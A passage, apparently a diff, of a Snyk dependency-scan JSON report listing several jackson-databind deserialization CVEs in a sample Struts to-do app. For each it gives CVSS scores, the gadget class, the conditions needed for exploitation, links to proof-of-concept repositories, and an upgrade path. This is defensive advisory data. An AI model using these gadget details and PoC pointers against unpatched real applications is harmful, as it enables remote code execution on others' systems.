"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36183" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:11:36.206859Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:10:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.627750Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.831271Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.319616Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.72318", - "probability": "0.00357", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36179" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:29:22.463416Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:12:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.759947Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.436792Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36182" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:30:54.237288Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:30:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.693276Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.622591Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36185" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:36:40.536722Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:34:52Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.303463Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:01.307628Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:42.513059Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36189" - ], - "CWE": [ - 